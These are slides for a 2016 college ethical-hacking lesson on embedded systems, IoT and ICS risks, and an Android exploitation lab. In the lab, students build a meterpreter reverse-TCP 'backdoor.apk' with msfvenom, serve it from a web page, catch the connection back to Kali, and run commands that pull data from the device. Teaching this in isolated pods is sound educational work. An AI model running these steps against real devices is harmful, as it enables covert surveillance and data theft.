CIS 76 - Lesson 11

Rich's lesson module checklist

 Slides and lab posted
 WB converted from PowerPoint
 Print out agenda slide and annotate page numbers

 Flash cards
 Properties
 Page numbers
 1st minute quiz
 Web Calendar summary
 Web book pages
 Commands

 Lab 9 tested and published

 Backup slides, whiteboard slides, CCC info, handouts on flash drive

 Spare 9v battery for mic
 Key card for classroom door

Last updated 11/8/2016

1
 CIS 76 - Lesson 11

Evading Network
TCP/IP
Devices
Cryptography Network and
Computer Attacks

Hacking Wireless Footprinting and

Networks
CIS 76 Social Engineering
Ethical Hacking
Hacking
Web Servers Port Scanning

Embedded Operating
Enumeration
Systems
Desktop and Server Scripting and
Vulnerabilities Programming

Student Learner Outcomes

1. Defend a computer and a LAN against a variety of different types of
security attacks using a number of hands-on techniques.

2. Defend a computer and a LAN against a variety of different types of

security attacks using a number of hands-on techniques. 2
 CIS 76 - Lesson 11

Introductions and Credits

Rich Simms
• HP Alumnus.
• Started teaching in 2008 when Jim Griffin went on
sabbatical.
• Rich’s site: http://simms-teach.com

And thanks to:

• Steven Bolt at for his WASTC EH training.
• Kevin Vaccaro for his CSSIA EH training and Netlab+ pods.
• EC-Council for their online self-paced CEH v9 course.
• Sam Bowne for his WASTC seminars, textbook recommendation and fantastic
EH website (https://samsclass.info/).
• Lisa Bock for her great lynda.com EH course.
• John Govsky for many teaching best practices: e.g. the First Minute quizzes,
the online forum, and the point grading system (http://teacherjohn.com/).
• Google for everything else!
3
 CIS 76 - Lesson 11

Student checklist for attending class

1. Browse to:
http://simms-teach.com
2. Click the CIS 76 link.
3. Click the Calendar link.
4. Locate today’s lesson.
5. Find the Presentation slides for
the lesson and download for
easier viewing.
6. Click the Enter virtual classroom
link to join CCC Confer.
7. Log into Opus with Putty or ssh
command.

Note: Blackboard Collaborate Launcher only

needs to be installed once. It has already
been downloaded and installed on the
classroom PC’s.

4
 CIS 76 - Lesson 11

Student checklist for suggested screen layout

 Google  CCC Confer  Downloaded PDF of Lesson Slides

 One or more login

 CIS 76 website Calendar page sessions to Opus
5
 CIS 76 - Lesson 11

Student checklist for sharing desktop with classmates

1) Instructor gives you sharing privileges.

2) Click overlapping rectangles

icon. If white "Start Sharing" text
is present then click it as well.

3) Click OK button.

4) Select "Share desktop"

and click Share button.
6
 CIS 76 - Lesson 11

Rich's CCC Confer checklist - setup

[ ] Preload White Board

[ ] Connect session to Teleconference

Session now connected

to teleconference

[ ] Is recording on?

Should change
Red dot means recording from phone
handset icon to
little Microphone
[ ] Use teleconferencing, not mic icon and the
Teleconferencing …
Should be grayed out message displayed

7
 CIS 76 - Lesson 11

Rich's CCC Confer checklist - screen layout

foxit for slides chrome

vSphere Client
putty

[ ] layout and share apps 8

 CIS 76 - Lesson 11

Rich's CCC Confer checklist - webcam setup

[ ] Video (webcam)
[ ] Make Video Follow Moderator Focus

9
 CIS 76 - Lesson 11

Rich's CCC Confer checklist - Elmo

The "rotate image"

button is necessary
if you use both the
side table and the
white board.

Quite interesting
that they consider
you to be an
Elmo rotated down to view side table
"expert" in order to
use this button!

Rotate
image
button Elmo rotated up to view white board

Rotate
image
button

Run and share the Image Mate

program just as you would any other
app with CCC Confer 10
 CIS 76 - Lesson 11

Rich's CCC Confer checklist - universal fixes

Universal Fix for CCC Confer:

1) Shrink (500 MB) and delete Java cache
2) Uninstall and reinstall latest Java runtime
3) http://www.cccconfer.org/support/technicalSupport.aspx

Control Panel (small icons) General Tab > Settings… 500MB cache size Delete these

Google Java download

11
CIS 76 - Lesson 11

Start
12
 CIS 76 - Lesson 11

Sound Check
Students that dial-in should mute their
line using *6 to prevent unintended
noises distracting the web conference.

Instructor can use *96 to mute all

student lines or *5 to boost audio input
volume.
13
 CIS 76 - Lesson 11

Instructor: Rich Simms

Dial-in: 888-886-3951
Passcode: 136690

Ryan Jordan Takashi Karl-Heinz Sean Benji Joshua Brian

Tess Jeremy David H. Roberto Nelli Mike C. Deryck Alex

Michael W. Carter Thomas Wes Jennifer Marcos Tim Luis

Dave R.

Email me ([email protected]) a relatively current photo of your face for 3 points extra credit
 CIS 76 - Lesson 11

First Minute Quiz

Please answer these questions in the order
shown:

email answers to: [email protected]

(answers must be emailed within the first few minutes of class for credit)
15
 CIS 76 - Lesson 11

Embedded Operating Systems

Objectives Agenda
• Understand what embedded operating systems • Quiz

are. • Questions
• In the news
• Describe various embedded operating systems
• Best practices
in use today.
• Housekeeping
• Identify ways to protect embedded operating
• Embedded systems
systems.
• Enterprise IoT Risk Report
• Industrial Control Systems
• Hacking a webcam (work in progress)
• Hacking Android
• Assignment
• Wrap up

16
 CIS 76 - Lesson 11

Admonition

17
Shared from cis76-newModules.pptx
 CIS 76 - Lesson 11

Unauthorized hacking is a crime.

The hacking methods and activities

learned in this course can result in prison
terms, large fines and lawsuits if used in
an unethical manner. They may only be
used in a lawful manner on equipment you
own or where you have explicit permission
from the owner.

Students that engage in any unethical,

unauthorized or illegal hacking may be
dropped from the course and will receive
no legal protection or help from the
instructor or the college. 18
 CIS 76 - Lesson 11

Questions
19
 CIS 76 - Lesson 11

Questions
How this course works?

Past lesson material?

Previous labs?

他問一個問題，五分鐘是個傻子，他不問一個問題仍然是一個
Chinese 傻瓜永遠。
Proverb He who asks a question is a fool for five minutes; he who does not ask a question
remains a fool forever.
20
 CIS 76 - Lesson 11

Shutdown all:

EH-WinXP VMs
EH-OWASP VMs

21
CIS 76 - Lesson 11

In the
news
22
 CIS 76 - Lesson 11

Recent news

Ukraine hackers claim huge Kremlin email breach

http://www.bbc.com/news/world-europe-37857658

• Claim to have hacked the emails of top Kremlin officials.

• Appears to show Russian control and financing of the
separatists in eastern Ukraine.
• Russian denies it and saying the hacked official does not use
email.

23
 CIS 76 - Lesson 11

Recent news

Drone hacks room of smart light blubs

http://www.theverge.com/2016/11/3/13507126/iot-drone-hack

• Researchers demonstrated infecting one Hue light with a

virus that spreads from lamp to lamp.
• The lights did not have to be on the same private network
to get infected.
• The researchers did not need physical access to the
lights.
• The infected lights blinked SOS in Morse code.
24
 CIS 76 - Lesson 11

Recent news

Top 10 gadgets for white hat hackers

http://www.welivesecurity.com/2016/10/31/10-gadgets-every-
white-hat-hacker-needs-toolkit/

1. Raspberry Pi 3 6. HackRF One

2. WiFi Pineapple 7. Ubertooth One
3. Alfa Network Board 8. Proxmark3 Kit
4. Rubber Ducky 9. Lockpicks
5. Lan Turtle 10. Keylogger
25
 CIS 76 - Lesson 11

Recent news

Microsoft fix for hack used by Russian hackers

http://www.therecord.com/news-story/6946321-microsoft-to-
block-windows-flaw-used-by-russian-hackers/

• Will address a hack used by a group Microsoft calls Strontium.

• CrowdStrike says Strontium is another name for the Russian
group Fancy Bear, AKA APT 28*.
• Flaw linked to the theft of DNC emails.
• The exploit involves multiple versions of Windows and Adobe
Flash.
• Adobe has already released a fix for Flash.
• The exploits were first discovered by Google's Threat Analysis
Group.
• Some policy conflict between Google and Microsoft on timing.
http://www.cso.com.a u/articl e/609439/googl e-outs-window s-ze ro-day -shiel ds-chrome -f irst/

26
*See 2014 FireEye report on APT 28 here: https://www2.f ireeye.com/CO N-A CQ-RP T-A PT28_LP .html
 CIS 76 - Lesson 11

More on APT 28

For more information on APT 28 see the 2014 FireEye here:

http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf

27
 CIS 76 - Lesson 11

Recent news
Fake office printer hijacks cell phone connection
http://arstechnica.com/information-technology/2016/11/this-evil-
office-printer-hijacks-your-cellphone-connection/

• People are used to cell phone towers disguised as trees.

• This one was disguised as an HP printer.
• It was a demonstration of cell phone privacy flaws.
• Using GSM technology nearby cell phones will connect to the
strongest signal which was the fake printer.
• Could potentially eavesdrop on SMS texts and voice calls.
• Instead it carries out a text message conversation with
hijacked phones, then connects them to a real cell tower.
28
 CIS 76 - Lesson 11

Recent news
No more "red purses" in Chrome
https://www.wired.com/2016/11/googles-chrome-hackers-flip-
webs-security-model/

Chrome
security
team

• Starting in January the HTTPS encryption indicators will clearly flag

"not secure" sites.
• Leader of the Chrome security team, Parisa Tabriz, started her security
job as a white-hat hacker testing Google's code.
• In 2010 she and another started a "Resident Hacker" program to train
programmers find, exploit and patch security bugs in their own code.
29
 CIS 76 - Lesson 11

Recent news
Mirai botnet attacks an entire country
http://www.forbes.com/sites/leemathews/2016/11/03/so http://www.esecurityplanet.com/network-
meone-just-used-the-mirai-botnet-to-knock-an-entire- security/massive-ddos-attacks-disable-internet-access-
country-offline/ throughout-liberia.html/

• The Mirai botnet first attacked security expert Brian Kreb's website
(620 Gbps of traffic).
• Then it attacked the Dyn DNS servers knocking out access to a
number of major websites (1200 Gbps of traffic).
• Now it was used against Liberia, population 4.5 million (500 Gbps of
traffic) bringing about service interruptions for a day.

30
 CIS 76 - Lesson 11

Recent news
Tesco bank attack involving 40,000 accounts
https://http://www.bbc.com/new https://www.theguardian.com/money/2016/nov/07/tesco -bank-
fraud-key-questions-answered-suspicious-transactions-40000-
s/technology-37896273/ accounts/

• Tesco is a British retail bank.

• It started as a joint venture between The Royal Bank of Scotland and
Tesco, the UK's largest supermarket.
• Suspicious transactions on some 40,000 accounts with money taken
from half of them.

31
 CIS 76 - Lesson 11

Recent news
China passes controversial cybersecurity law
http://computerworld.com/article/3138951/security/china-passes-controversial-cybersecurity-law.html/

http://www.reuters.com/article/us-china-parliament-cyber-idUSKBN132049

• Strengthens control over the Internet in China.

• Foreign companies must store personal information and business data
on servers in China.
• Companies must submit to a security assessment if data is to be
moved out of the country.
• Prohibited content includes overthrowing the socialist system, splitting
the nation, undermining national unity and advocating terrorism and
extremism.
32
 CIS 76 - Lesson 11

Best
Practices
33
 CIS 76 - Lesson 11

Online Banking Best Practices

1. Choose a strong password and do not reuse it with other

accounts.

2. Keep your PC, phone or tablet updated.

3. Be on the look-out for phishing emails that capitalize on the

news about any breach.

4. Use the bank's two-factor authentication.

http://www.bbc.com/news/technology-37896273

Additional contributions from the classroom:

6. Close the session when done.

7. Don't have lots of other tabs open.
8. Don't use answers to the security questions that will reveal personal information if
compromised.
9. Outside of online banking it was noted that many companies ask for your real
birthdate which they don't really need. That information could also be compromised. 34
 CIS 76 - Lesson 11

Smart Device Best Practices

1. Do and inventory of all IoT devices

2. Change the default passwords.

3. Disable Universal Plug and Play (UPnP). Check your

router too on this.

4. Disable remote management via telnet or ssh.

5. Check for software updates and patches.

http://thehackernews.com/2016/10/ddos-attack-mirai-iot.html

35
 CIS 76 - Lesson 11

Housekeeping

36
 CIS 76 - Lesson 11

Housekeeping

1. Lab 8 due tonight by 11:59pm.

2. Note: Lab 9 and five post due next week.

3. You can still send me your photo for our class page if you
want 3 points extra credit.

37
 CIS 76 - Lesson 11

Where to find your grades

Send me your survey to get your LOR code name.

The CIS 76 website Grades page Or check on Opus

http://simms-teach.com/cis76grades.php
checkgrades codename
(where codename is your LOR codename)

Written by Jesse Warren a past CIS 90 Alumnus

Points that could have been earned:

7 quizzes: 21 points
7 labs: 210 points
2 tests: 60 points
2 forum quarters: 40 points
Total: 331 points

At the end of the term I'll add up all

your points and assign you a grade
using this table 38
 CIS 76 - Lesson 11

Heads up on Final Exam

Test #3 (final exam) is THURSDAY Dec 15 4-6:50PM

Extra credit
labs and
Thur final posts
due by
11:59PM

• All students will take the test at the same time. The test must be
completed by 6:50PM.

• Working and long distance students can take the test online via
CCC Confer and Canvas.

• Working students will need to plan ahead to arrange time off from
work for the test.
39
• Test #3 is mandatory (even if you have all the points you want)
CIS 76 - Lesson 11

40
 CIS 76 - Lesson 11

Red and Blue

Teams

43
 CIS 76 - Lesson 11

Red and Blue Pods in Microlab Lab Rack

Red Pod

Blue Pod

Red and Blue VMs

Rules of engagement updated regarding VLab credentials.

44
Send me an email if you would like to join a team.
 CIS 76 - Lesson 11

Embedded
Systems

45
 CIS 76 - Lesson 11

Embedded Operating Systems

Embedded systems, unlike general purpose PCs and servers, are

appliances/devices built with a computer system to perform a specific
function:

• Network devices like routers, switches, firewalls and access points

• Digital video recorders like Tivo
• Bank ATMs
• Smart phones
• GPSs
• Point of sale "cash registers"
• Entertainment systems like the ones found in airliners
• HVAC systems like the one in building 800
• Factory automation
• IoT devices
• Airliner and jet fighter Avionics
• Printers, scanners, faxes, copiers
• And many more

46
 CIS 76 - Lesson 11

Embedded Operating Systems

Embedded operating systems

• Small, efficient and often require less power.

• Typically use less memory and have no hard drive.
• Examples:
• Stripped down versions of desktop operating
systems:
• Linux
• Windows Embedded family
• Real Time Operating Systems (RTOS)
• VxWorks by Wind River Systems
• Green Hills Software
• QNX
• Siemens
• Are networked
• Can be difficult to patch 47
 CIS 76 - Lesson 11
Embedded Linux
(just a few)

Katana Erle-Copter Asus RT-AC66U

Nest Cam Amazon Stir smart desk
Robotic Arm drone wireless router
Kindle

Tivo Yamaha Disklavier Some TomTom Garmin Buffalo

Mark IV Android GPS models Nuvi 5000 NAS storage
Cell Phones

Virgin America TripBPX

Personal Phone MikroTik Sony TVs Polycom
Android Tablets Raspberry Pi
Entertainment System Routers VOIP
Phone
For more see: http://linuxgizmos.com/category/devices/ 48
 CIS 76 - Lesson 11
Windows Embedded Family

http://news.thewindowsclub.com/microsoft-unveils-windows-embedded-8-1-download-industry-release-preview-now-64071/ 49
CIS 76 - Lesson 11

Windows XP Embedded

50
 CIS 76 - Lesson 11
Embedded Windows Family for Medical Products

51
http://ocs.arrow.com/msembedded/medical/
 CIS 76 - Lesson 11

Wind River Systems

VxWorks Real Time Operating System

Mars Rover Jetliner avionics Medical Systems

Map Displays Control Systems for Industrial Systems

large Telescopes

http://www.windriver.com/customers/ 52
 CIS 76 - Lesson 11

Green Hills Software

Integrity RTOS

http://www.ghs.com/CustomerGallery.html 53
 CIS 76 - Lesson 11

QNX
QNX OS and QNX Neutrino RTOS

https://www.qnx.com/ 54
CIS 76 - Lesson 11

Siemens
SIMATIC PCS 7

55
 CIS 76 - Lesson 11

IoT Risk
Report

56
 CIS 76 - Lesson 11

ForeScout IoT Enterprise Risk Report

https://www.scribd.com/document/328841509/Hackable-devices 57
 CIS 76 - Lesson 11

ForeScout IoT Enterprise Risk Report

https://www.youtube.com/watch?v=CeTILnlh2ek&feature=youtu.be
58
 CIS 76 - Lesson 11

Industrial
Control
Systems
59
 CIS 76 - Lesson 11

Industrial Control Systems

Industrial Control Systems

• SCADA (Supervisory Control and Data Acquisition)

• SCADA is a category of software for process control and
automation.
• Used in power plants, oil refineries, telecommunications,
transportation, water and waste control.
• Examples:
• Siemans SIMATIC WinCC

60
 CIS 76 - Lesson 11

https://instrumentsignpost.files.wordpress.com/2012/02/sanscybersecurityposter.jpg 61
 Idaho National Lab Aurora Demonstration

https://www.youtube.com/watch?v=fJyWngDco3g

• 3.8 MVA diesel electrical poser generator damaged

by demonstration cyber attack
https://www.smartgrid.gov/files/Aurora_Vulnerability_Issues_Solution_Hardware_Mitigation_De_201102.pdf
 CIS 76 - Lesson 11

STUXNET

The attack on Iran's nuclear centrifuges

https://sharkscale.wordpress.com/2016/02/06/defending-against-stuxnet/
 CIS 76 - Lesson 11

Hacking a
Webcam

Work in Progress
68
 CIS 76 - Lesson 11

D-Link 933L

RJ-45 LAN Jack

Power LED
Reset hole
WPS (WiFi Protected Setup)

http://us.dlink.com/products/home-solutions/day-
night-wifi-camera-dcs-933l/ 69
CIS 76 - Lesson 11

https://www.cvedetails.com/ 70
CIS 76 - Lesson 11

71
CIS 76 - Lesson 11

72
CIS 76 - Lesson 11

73
 CIS 76 - Lesson 11

74
https://www.rapid7.com/db/modules/exploit/linux/http/dlink_dcs931l_upload
CIS 76 - Lesson 11

75
 CIS 76 - Lesson 11

McLean, Virginia - February 25, 2015,

Tangible Security researchers Mike Baucom, Allen Harper, and J. Rach discovered serious
vulnerabilities in two devices made by D-Link.
https://tangiblesecurity.com/index.php/announceme
D-Link DCS-931L nts/tangible-security-researchers-notified-and-
assisted-d-link-with-fixing-critical-device-
A Day & Night Wi-Fi Camera vulnerabilities
• More info from vendor
• CVE-2015-2049
• Vulnerability Description: A hidden webpage on the device allows an attacker to upload arbitrary files
from the attackers system. By allowing the attacker to specify the file location to write on the device,
the attacker has the ability to upload new functionality. The D-Link DCS-931L: Firmware Version 1.04
(2014-04- 21) / 2.0.17-b62. Older versions and configurations were NOT tested. This also applies to
DCS-930L, DCS-932L, DCS-933L models.
• Impact Description: By allowing any file in the file system to be overwritten, the attacker is allowed to
overwrite functionality of the device. The unintended functionality reveals details that could lead to
further exploitation. There are security impacts to the confidentially, integrity, and availability of the
device and its services.
< Snipped >
Tangible Security is unaware of any public exploits of these vulnerabilities. However, due to
the categorization of these vulnerabilities, it may be reasonable to believe that cyber
criminals are doing so.
We urge users of these devices, including older and newer models, to download and install
the latest firmware updates available from D-Link that address these vulnerabilities. Failing
to do so exposes those benefiting from the use of these devices to cyber crime risks.
Our researchers wish to express their appreciation for D-Link’s cooperation and desire to
make their products and customers more secure. 76
CIS 76 - Lesson 11

77
 CIS 76 - Lesson 11

78
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/dlink_dcs931l_upload.rb
CIS 76 - Lesson 11

79
CIS 76 - Lesson 11

80
CIS 76 - Lesson 11

81
CIS 76 - Lesson 11

82
CIS 76 - Lesson 11

83
CIS 76 - Lesson 11

84
 CIS 76 - Lesson 11

Hacking an
Android Device

85
 CIS 76 - Lesson 11

Shutdown all:

EH-WinXP VMs
EH-OWASP VMs

86
 CIS 76 - Lesson 11

Part 1
EH-pfSense-xx

Setup DHCP
87
CIS 76 - Lesson 11

EH-pfSense-xx

Browse to your EH-pfSense-xx VM.

Under the Service menu, select DHCP Server.

88
 CIS 76 - Lesson 11

EH-pfSense-xx

This example was done on Pod 5. Be sure to use your own

pod number when configuring DHCP. 89
 CIS 76 - Lesson 11

EH-pfSense-xx

To activate your changes click the Save

button at the bottom of the window.

90
 CIS 76 - Lesson 11

Part 2
EH-Lolli-xx
Setup, snapshot, and
test 91
 CIS 76 - Lesson 11

Android-x86 Project
Android-x86 ISOs available here

http://www.android-x86.org/ 92
 CIS 76 - Lesson 11

Android-x86 Project

The Android 5.5 Lollipop release works fine as an ESXi VM

To make a ESXi VM use 1GB RAM, E1000 adapter, and an IDE hard drive. Make
100MB SDA partition for grub and boot files and a second SDB partition for
everything else. Install Android-x86 on the second partition. Be sure to make
the first partition bootable!

http://www.android-x86.org/download 93
 CIS 76 - Lesson 11

EH-Lolli-xx

1. Use Edit Settings... to join your EH-Lolli-xx VM to

your pod network.

xx

2. Create a snapshot named Baseline.

3. Power up.

Initial setup for your new Lollipop VM 94

CIS 76 - Lesson 11

EH-Lolli-xx

Home button 95
CIS 76 - Lesson 11

EH-Lolli-xx

Terminal Emulator App 96

 CIS 76 - Lesson 11

EH-Lolli-xx
ifconfig eth0
ping google.com
Ctrl-C
exit

Check that your EH-Lolli-xx VM got an IP address from your EH-

pfSense-xx VM and has network connectivity. 97
 CIS 76 - Lesson 11

Part 3
EH-Lolli-xx
Create some data
(to steal)
98
CIS 76 - Lesson 11

EH-Lolli-xx

Browser icon 99
CIS 76 - Lesson 11

EH-Lolli-xx

Find some pictures you like 100

 CIS 76 - Lesson 11

EH-Lolli-xx

Select one picture then click-and-hold to get pop-up menu 101

CIS 76 - Lesson 11

EH-Lolli-xx

Save the image 102

CIS 76 - Lesson 11

EH-Lolli-xx

File Manager App 103

CIS 76 - Lesson 11

EH-Lolli-xx

File Manager App 104

CIS 76 - Lesson 11

EH-Lolli-xx

105
 CIS 76 - Lesson 11

Part 4
EH-Kali-xx
Create backdoor
payload
106
 CIS 76 - Lesson 11

EH-Kali-xx

msfvenom -l | grep droid

msfvenom
• is a payload generator.
• It replaces the older msfpayload and msfencode tools.

https://www.offensive-security.com/metasploit-unleashed/msfvenom/

107
 CIS 76 - Lesson 11

EH-Kali-xx

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.76.5.150 LPORT=4444 R > backdoor.apk

root@eh-kali-05:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=10.76.5.150 LPORT=4444 R > backdoor.apk

No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9487 bytes

root@eh-kali-05:~#

This creates a "back door" payload for Android. When it runs it will
connect back to EH-Kali-05 in Pod 5 at 10.76.5.150 using port 4444.

msfvenom
• is a payload generator.
• It replaces the older msfpayload and msfencode tools.

https://www.offensive-security.com/metasploit-unleashed/msfvenom/

108
 CIS 76 - Lesson 11

Part 5
EH-Kali-xx

Make a website
109
 CIS 76 - Lesson 11

EH-Kali-xx

cd /var/www/html
scp -r xxxxx76@opus:/home/cis76/depot/webpages/* .
mkdir files
cp /root/backdoor.apk files/

root@eh-kali-05:/var/www/html# scp -r simben76@opus:/home/cis76/depot/webpages/* .

simben76@opus's password:
admonition 100% 33 0.0KB/s 00:00
cylons.html 100% 352 0.3KB/s 00:00
humans.html 100% 373 0.4KB/s 00:00
galactica.png 100% 39KB 39.1KB/s 00:00
cylon.gif 100% 1074KB 1.1MB/s 00:00
index.html 100% 156 0.2KB/s 00:00
root@eh-kali-05:/var/www/html# ls
admonition backup-L9.tar cylons.html humans.html images index.html
root@eh-kali-05:/var/www/html#

Build a website to distribute the "backdoor" payload

110
 CIS 76 - Lesson 11

EH-Kali-xx

Edit index.html and add this line:

<p>Please download this malicious file and install it: <a

href="files/backdoor.apk">backdoor.apk</a></p>

Create a files directory for the payload file then set permissions.
111
 CIS 76 - Lesson 11

EH-Kali-xx

service apache2 start

root@eh-kali-05:/var/www/html# service apache2 start

root@eh-kali-05:/var/www/html#

Start the web service on EH-Kali

112
 CIS 76 - Lesson 11

EH-Kali-xx

Test your website on EH-Kali by browsing to localhost 113

 CIS 76 - Lesson 11

Part 6
EH-Kali-xx

Exploit Android
114
 CIS 76 - Lesson 11
root@eh-kali-05:~# service postgresql start
root@eh-kali-05:~#
A database appears
root@eh-kali-05:~#
msfdb init
to be already configured, skipping initialization
msfconsole
EH-Kali-xx
######## #
################# #
###################### #
######################### # cd
############################ service postgresql start
##############################
############################### msfdb init
###############################
##############################
msfconsole
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### #### Start Metasploit
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
http://metasploit.com

=[ metasploit v4.12.15-dev ]
+ -- --=[ 1563 exploits - 904 auxiliary - 269 post ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > 115

 CIS 76 - Lesson 11

EH-Kali-xx

use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 10.76.5.150
set lport 4444
exploit

msf > use multi/handler

msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.76.5.150
LHOST => 10.76.5.150
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 10.76.5.150:4444

[*] Starting the payload handler...

Set up a handler to listen for the "backdoor" on the Android to connect back.

116
 CIS 76 - Lesson 11

Part 7
EH-Lolli-xx

Install malicious
payload 117
CIS 76 - Lesson 11

EH-Lolli-xx

Select the browser 118

 CIS 76 - Lesson 11

Browse to EH-Kali at http://10.76.xx.150 and download the file. 119

 CIS 76 - Lesson 11

Drag from the top of the window down to reveal the

downloaded file. Select it for installation.

120
 CIS 76 - Lesson 11

On the Warning message select Settings 121

 CIS 76 - Lesson 11

Enable installation from unknown sources then select Home

122
CIS 76 - Lesson 11

123
Select File Manager
CIS 76 - Lesson 11

Select Download folder 124

CIS 76 - Lesson 11

Select backdoor.apk to install 125

CIS 76 - Lesson 11

126
CIS 76 - Lesson 11

127
CIS 76 - Lesson 11

128
CIS 76 - Lesson 11

129
 CIS 76 - Lesson 11

Part 8
EH-Kali-xx

Exfiltrate image file

130
 CIS 76 - Lesson 11

EH-Kali-xx

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 10.76.5.150:4444

[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 10.76.5.120
[*] Meterpreter session 1 opened (10.76.5.150:4444 -> 10.76.5.120:54598) at 2016-11-05 18:54:44 -0700

meterpreter >

Once the backdoor app is opened on the Victim's Android we get a session on EH-Kali.

131
 CIS 76 - Lesson 11

EH-Kali-xx

geolocate
dump_sms
webcam_stream
record_mic

meterpreter > geolocate

[-] geolocate: Operation failed: 1
meterpreter > dump_sms
[*] No sms messages were found!
meterpreter > webcam_stream
[-] Target does not have a webcam
meterpreter > record_mic
[*] Starting...
[*] Stopped
Audio saved to: /root/DqSWstCd.wav
meterpreter >

These commands don't appear to work on the VM.

They do work on real Android phones though. See examples here:

http://resources.infosecinstitute.com/lab-android-exploitation-with-kali/ 132
 CIS 76 - Lesson 11

EH-Kali-xx

sysinfo
meterpreter > sysinfo
Computer : localhost
OS : Android 5.1.1 - Linux 4.0.9-android-x86+ (i686)
Meterpreter : java/android
meterpreter >

133
 CIS 76 - Lesson 11

ipconfig
meterpreter > ipconfig
EH-Kali-xx
Interface 1
============
Name : ip6tnl0 - ip6tnl0
Hardware MAC : 00:00:00:00:00:00

Interface 2
============
Name : lo - lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::

Interface 3
============
Name : sit0 - sit0
Hardware MAC : 00:00:00:00:00:00

Interface 4
============
Name : eth0 - eth0
Hardware MAC : 00:50:56:af:78:28
IPv4 Address : 10.76.5.120
IPv4 Netmask : 255.0.0.0
IPv6 Address : fe80::250:56ff:feaf:7828
IPv6 Netmask : ::
134
meterpreter >
 CIS 76 - Lesson 11

EH-Kali-xx

pwd
meterpreter > pwd
/data/data/com.metasploit.stage/files
meterpreter >

135
 CIS 76 - Lesson 11
meterpreter > cd /
meterpreter > ls
Listing: /
==========
cd /
ls EH-Kali-xx
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40444/r--r--r-- 0 dir 2016-11-06 15:05:08 -0800 acct
40000/--------- 80 dir 2016-11-06 15:05:20 -0800 cache
0000/--------- 0 fif 1969-12-31 16:00:00 -0800 charger
40000/--------- 40 dir 2016-11-06 15:05:08 -0800 config
40444/r--r--r-- 0 dir 2016-11-06 15:05:05 -0800 d
40000/--------- 4096 dir 2016-11-06 15:01:27 -0800 data
100444/r--r--r-- 320 fil 2016-11-06 15:05:06 -0800 default.prop
40444/r--r--r-- 3840 dir 2016-11-06 15:05:10 -0800 dev
40444/r--r--r-- 4096 dir 2015-10-06 09:52:36 -0700 etc
100444/r--r--r-- 11166 fil 2016-11-06 15:05:06 -0800 file_contexts
100000/--------- 342 fil 2016-11-06 15:05:06 -0800 fstab.android_x86
100000/--------- 850420 fil 2016-11-06 15:05:06 -0800 init
100000/--------- 5666 fil 2016-11-06 15:05:06 -0800 init.android_x86.rc
100000/--------- 1022 fil 2016-11-06 15:05:06 -0800 init.bluetooth.rc
100000/--------- 944 fil 2016-11-06 15:05:06 -0800 init.environ.rc
100000/--------- 21746 fil 2016-11-06 15:05:06 -0800 init.rc
100000/--------- 588 fil 2016-11-06 15:05:06 -0800 init.superuser.rc
100000/--------- 1927 fil 2016-11-06 15:05:06 -0800 init.trace.rc
100000/--------- 3885 fil 2016-11-06 15:05:06 -0800 init.usb.rc
100000/--------- 301 fil 2016-11-06 15:05:06 -0800 init.zygote32.rc
40444/r--r--r-- 8192 dir 2015-10-06 12:32:34 -0700 lib
40444/r--r--r-- 160 dir 2016-11-06 15:05:08 -0800 mnt
40444/r--r--r-- 0 dir 2016-11-06 15:05:05 -0800 proc
100444/r--r--r-- 2771 fil 2016-11-06 15:05:06 -0800 property_contexts
40000/--------- 140 dir 2016-11-06 15:05:06 -0800 sbin
40666/rw-rw-rw- 4096 dir 2016-11-06 14:44:45 -0800 sdcard
100444/r--r--r-- 471 fil 2016-11-06 15:05:06 -0800 seapp_contexts
100444/r--r--r-- 76 fil 2016-11-06 15:05:06 -0800 selinux_version
100444/r--r--r-- 118329 fil 2016-11-06 15:05:06 -0800 sepolicy
100444/r--r--r-- 9438 fil 2016-11-06 15:05:06 -0800 service_contexts
40444/r--r--r-- 180 dir 2016-11-06 15:05:08 -0800 storage
40444/r--r--r-- 0 dir 2016-11-06 15:05:06 -0800 sys
40444/r--r--r-- 4096 dir 1969-12-31 16:00:00 -0800 system
100444/r--r--r-- 382 fil 2016-11-06 15:05:06 -0800 ueventd.android_x86.rc
